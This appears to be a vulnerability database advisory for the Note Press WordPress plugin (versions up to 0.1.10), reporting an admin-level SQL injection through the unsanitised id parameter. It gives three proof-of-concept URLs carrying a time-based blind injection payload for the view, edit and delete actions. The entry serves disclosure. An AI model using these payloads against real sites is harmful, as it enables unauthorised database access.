Lucene search

K
wpexploitDaniel KrohmerWPEX-ID:63D4444B-9B04-47F5-A692-C6C6C8EA7D92
HistoryMay 09, 2022 - 12:00 a.m.

Note Press <= 0.1.10 - Admin+ SQLi via id

2022-05-0900:00:00
Daniel Krohmer
83

0.001 Low

EPSS

Percentile

21.8%

The plugin does not sanitise and escape the id parameter before using it in various SQL statement via the admin dashboard, leading to SQL Injections

https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=view&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=delete&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)

0.001 Low

EPSS

Percentile

21.8%

Related for WPEX-ID:63D4444B-9B04-47F5-A692-C6C6C8EA7D92